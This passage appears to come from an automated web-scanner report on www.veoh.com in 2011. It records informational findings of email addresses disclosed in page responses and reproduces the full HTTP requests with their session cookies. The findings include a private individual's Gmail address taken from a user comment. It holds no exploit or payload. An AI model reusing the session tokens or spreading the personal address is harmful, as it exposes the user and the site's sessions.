GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:43 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=89 Content-Length: 134408
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:23 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=73 Content-Length: 147258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
optout@veoh.com
privacy@veoh.com
Request
GET /corporate/privacypolicy HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:33 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=21 Content-Length: 36356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... <a href="mailto:privacy@veoh.com">privacy@veoh.com</a> ...[SNIP]... certain communications from us regarding products and services in which you may be interested. If you do not opt-out at the time you provide information, but choose to opt-out later, send an email to optout@veoh.com or click <a href="mailto:optout@veoh.com"> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
PRABANSHU.JI@GMAIL.COM
advertising@veoh.com
Request
GET /users/Veoh-Upcoming-Movies HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:05 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=44 Content-Length: 31732
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... <p class="comment-body">Hey I am psychologist. To solve any problems relatad to human life. As well as pc & net problems also. So to asked question?..mail me PRABANSHU.JI@GMAIL.COM</p> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...